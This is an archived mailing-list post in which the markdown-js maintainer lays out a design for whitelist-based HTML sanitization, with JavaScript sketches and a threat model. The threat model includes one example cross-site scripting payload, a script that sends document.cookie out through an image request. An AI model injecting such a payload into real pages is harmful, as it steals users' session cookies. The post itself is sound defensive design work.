HTML sanitization

Kragen Javier Sitaker kragen+pairlist at
Fri Jul 29 11:59:22 EDT 2011


I'm going to add HTML sanitization to markdown-js, and I wanted to hear about
other people's experience with this. This mail is long (about five minutes to
read), but I'll waste a lot more than five minutes if I go down a dead-end
rabbit hole on this. From my comments on [the issue on GitHub][]:

[the issue on GitHub]: (issue 16 on markdown-js: "HTML support")

(I've bolded some phrases below to facilitate skimming; hope it's not too
annoying when you're reading straight through.)

Okay, well, I guess I'm committed to implementing this, then. Here's what I'm
thinking about how to do it. Is this a good way to do it? **I'd really
appreciate comments** before I go haring off without the benefit of other
people's advice and experience.

* JsonML doesn't have a spec written in English, as far as I can tell, just a
[BNF grammar][] and some example implementations in [XSLT][] and [JS with
the DOM][DOM]. As far as I can tell, both of the example implementations
unescape entity references on input and re-escape them on output, although
there's no English text to explain whether this is intentional or a bug.

I assert that **this is a bug**, because it robs JsonML of any way to
represent SGML entity references. I propose that JsonML strings should be
treated as PCDATA — allowed to contain entities but not tags — rather than
CDATA (plain text) or HTML (text with entities and tags).

[BNF grammar]: (The JSONML spec)

* Accordingly, when we *parse* a code block or inline code chunk, we should
escape `&` and `<` in it, and when we parse any other node, we should run
it through an HTML parser to break it down into subnodes, ensuring that
it's well-formed, modulo possible references to entities that we don't know
about. (I don't propose to include a list of all defined HTML entities
into markdown-js.) This means that in general we will **not escape HTML on
output**. It also means that the effect of poorly-nested input tags will
be limited to at most one parse-tree node.

* The HTML parser used as an input filter should be **configurable with
whitelists** of tags, attributes per tag, and URL schemes per attribute. By
default it should be configured with a fairly strict filter, blocking even
inline images and iframes with off-host URIs, and of course any possible
vector for JS. This will annoy people like cadorn, for whom such filtering
is unnecessary, so they need an easy way to turn off the whitelists (if not
the HTML parsing entirely). But I think that is better
than someone doing a `git pull` on markdown-js and getting privacy and XSS
problems added to their application. That is, **the default should be
safe**.

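To make the PCDATA treatment in the first point concrete, here's a sketch
renderer (not markdown-js code; it ignores JsonML attribute objects for
brevity). The point is that entity references survive in the tree, so the
renderer can emit strings verbatim instead of unescaping and re-escaping:

```javascript
// Sketch: render a JsonML tree whose strings are PCDATA (entities allowed,
// tags not). Attribute objects are omitted to keep the example short.
function render(jsonml) {
  if (typeof jsonml === "string") return jsonml; // PCDATA: emit as-is
  var tag = jsonml[0];
  var out = "<" + tag + ">";
  for (var i = 1; i < jsonml.length; i++) out += render(jsonml[i]);
  return out + "</" + tag + ">";
}

// The entity reference is preserved, never decoded to a character we might
// not know how to re-encode:
var html = render(["p", "Copyright &copy; 2011, ", ["em", "Kragen"]]);
```
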
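The escaping step for code blocks and inline code in the second point is
tiny; a sketch:

```javascript
// Only `&` and `<` need escaping in code content, since code carries no
// markup of its own. `&` must be replaced first so we don't double-escape.
function escapeCode(text) {
  return text.replace(/&/g, "&amp;").replace(/</g, "&lt;");
}
```
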
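And here's roughly the whitelist shape I have in mind for the third point
(the names are illustrative, not a settled markdown-js API):

```javascript
// Sketch: whitelists of tags, attributes per tag, and URL schemes per
// attribute. The defaults shown here are made up for illustration.
var defaultWhitelist = {
  tags: ["p", "em", "strong", "code", "pre", "blockquote", "ul", "ol", "li", "a"],
  attributes: { a: ["href", "title"] },
  schemes: { href: ["http", "https", "mailto"] }
};

function attrAllowed(whitelist, tag, attr, value) {
  var attrs = whitelist.attributes[tag] || [];
  if (attrs.indexOf(attr) === -1) return false;
  var schemes = whitelist.schemes[attr];
  if (!schemes) return true; // no scheme restriction on this attribute
  var m = /^([a-zA-Z][a-zA-Z0-9+.-]*):/.exec(value);
  return !m || schemes.indexOf(m[1].toLowerCase()) !== -1; // relative URLs pass
}
```

Checking the scheme on the parsed attribute value, rather than
pattern-matching the raw markup, is what keeps `javascript:` and friends out
without also rejecting relative URLs.
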
I'm **hoping I can use an existing pure-JS HTML parser** — say, [jsdom][]'s, or
[kn_htmlsafe_htmlSanitize][], or [NodeHtmlParser][] — rather than hacking one
together from scratch. (As a fallback, I could write a very simple parser for
the tags-and-attributes subset of XHTML.) I'm a little worried about the
performance implications of this; markdown-js is already a little slower than
Showdown, and this could make the matter worse. Does **anybody have
recommendations here?**

(In the case where it's running in a modern browser, we could use `DOMParser`
as an optimization, but enough people are using markdown-js in Node that I
think it doesn't make sense to depend on that.)
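
The optimization could look something like this sketch (feature detection,
with `fallbackParse` standing in for whichever pure-JS parser gets chosen;
note that `parseFromString` with `"text/html"` isn't supported everywhere, so
even this would need feature-testing in practice):

```javascript
// Sketch: prefer the browser's DOMParser when it exists, otherwise fall
// back to a pure-JS parser supplied by the caller.
function pickParser(fallbackParse) {
  if (typeof DOMParser !== "undefined") {
    return function (html) {
      return new DOMParser().parseFromString(html, "text/html");
    };
  }
  return fallbackParse;
}
```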

[jsdom]: (Elijah Insua's MIT-licensed pure-JS implementation of the W3C DOM)
[kn_htmlsafe_htmlSanitize]: (Ben Sittler's 3-clause BSD-licensed pure-JS HTML sanitizer; whitelisting, but not particularly configurable)
[NodeHtmlParser]: (a forgiving HTML/XML/RSS parser written in JS for both the browser and NodeJS)

Other variations:

1. **Parse HTML on output**, not input, instead of building JsonML nodes in
the intermediate representation.

This has the disadvantage that it would make some kinds of processing on
the intermediate representation harder — for example, in [yamemex][], I
want to support Twitter-style #hashtags, and that will be easier to do if I
can tell which hash marks are in the text of the document and which are in
some URL somewhere. Also, any markup added by intermediate-representation
processing would be prone to being stripped by the output filter.

The advantage is that it would probably make the intermediate processing
run faster and take less memory, and it expands the HTML parsers that can
be used beyond just those that build a parse tree, which is slow; HTML
parsers that simply produce sanitized HTML could be used. Also, the
intermediate representation would be simpler, since it wouldn't have HTML
tag names in it. This would involve changing the intermediate "JsonML"
representation to have HTML rather than CDATA or PCDATA contents — so `&`
would be represented as `&amp;` in the intermediate representation, not as
`&`, and `<b>` would mean `<b>`.

2. Leave the semantics of the intermediate representation unchanged aside from
adding more tag names, parsing HTML on input and **using an exhaustive
list of HTML entities** to convert things like `&copy;` &copy; and
`&ddagger;` &ddagger; to Unicode characters. I think this would be a hassle
to maintain. (Note that &ddagger; doesn't show up correctly here
[clarification: on GitHub] because GitHub has undertaken to maintain such a
list for their Markdown implementation — and failed. Visit the URL
`data:text/html,&ddagger;` to see that your browser supports it.)

3. Rather than parsing HTML on input or when rendering each node for output,
pass through HTML tags from input to output (except inside code blocks, of
course) and then run a final HTML-sanitizing pass on the output string to
ensure that it's well-formed and safe. This has the advantage of very
minimal coupling, and it would handle e.g. `<img
src="">` the same way regardless of whether it
was generated from `![ ](` or just included
literally in the source; the disadvantages are that it may be even slower
than the other alternatives (making an additional pass over markup whose
well-formedness and safety is guaranteed by construction), it could be a
little more bug-prone ("Where did all of my `<ol>`s go? Oh, I left `ol` out
of the whitelist."), and it doesn't facilitate intermediate processing in
any way.
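
The kind of table variation 2 would require looks like this (a tiny sketch;
the real list of named entities runs to hundreds of names, which is exactly
the maintenance burden I'm worried about):

```javascript
// Sketch: a deliberately incomplete named-entity table and a decoder that
// leaves unknown references untouched.
var entities = { amp: "&", lt: "<", gt: ">", quot: "\"", copy: "\u00a9", ddagger: "\u2021" };

function decodeEntities(text) {
  return text.replace(/&([a-zA-Z]+);/g, function (match, name) {
    return entities.hasOwnProperty(name) ? entities[name] : match;
  });
}
```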
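
Variation 3 boiled down to its final pass might look like this (a
deliberately naive sketch; a real sanitizer must also handle attributes,
comments, and malformed markup, which is why I'd rather reuse an existing
parser):

```javascript
// Sketch: strip every tag whose name isn't whitelisted, leaving the text
// content behind. Attributes on allowed tags are passed through untouched
// here, which a real implementation must NOT do.
function stripDisallowedTags(html, allowedTags) {
  return html.replace(/<\/?([a-zA-Z][a-zA-Z0-9]*)[^>]*>/g, function (tag, name) {
    return allowedTags.indexOf(name.toLowerCase()) === -1 ? "" : tag;
  });
}
```

This also makes the bug-proneness concrete: leave `ol` out of the whitelist
and every `<ol>` silently vanishes from the output.
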

[yamemex]: (my project using markdown-js for, ultimately, social bookmarking)

So, **what do other people think?** The above represents a few hours of me
thinking about the problem, but I anticipate that implementing it will take at
least a few days of work, so I'd really appreciate help in thinking this
through before I jump in.


P.S. I guess I should elaborate a little bit on the kinds of use cases/threat
models I'm thinking of here:

1. Using Markdown to write your own blog on your own domain, which is cadorn's
use case. There's little benefit to filtering your markup in this case; the
worst case is that your blog is formatted funny because you forgot to close
a `<blockquote>` or something. Unless you copy and paste a chunk of HTML
from somewhere else, which brings us to:

2. Using Markdown to render stuff pulled (manually or automatically) from
another [origin][]. The risk here is that the author of the stuff may have
included some code to take actions on your behalf and exfiltrate your
private information (known as "cross-site scripting"), either in a
straightforward way such as `<script>im=new Image();
im.src=""+document.cookie</script>` or some
more subtle way designed to evade naïve filters. Doing this reliably
requires that you use a whitelist rather than a blacklist so you don't end
up like the [stupid losers who built MySpace][Samy].

[origin]: (as defined in the same-origin policy)
[Samy]: (Samy Kamkar explains the unbelievably incompetent security measures he hacked around to crash MySpace)

Note that this category includes things like blogging software where
someone might plausibly copy and paste a piece of someone else's web page
in order to quote it.

3. Using Markdown to render stuff sent by a possible spammer or by someone else
who has an illegitimate interest in knowing whether you have read it — such
as email — in which case you do *not* want to confirm to the spammer that
you have read it. In this case you want to filter out anything whose rendering
will generate network traffic (to anywhere other than the source of the
rendered document, that is), such as `<img src>` and `<iframe>`, as well as
all the items covered in #2 above.

I believe yamemex is in category 2, because I excerpt the pages I bookmark with
it all the time. markdown-js is currently safe for this case because it escapes
all HTML, but I want it to let through safe HTML. I think that almost any
server-based web application that renders Markdown taken from client requests
is in category 2, if not category 3, and I think (though I don't know) that
many markdown-js applications do that.

More information about the Markdown-Discuss mailing list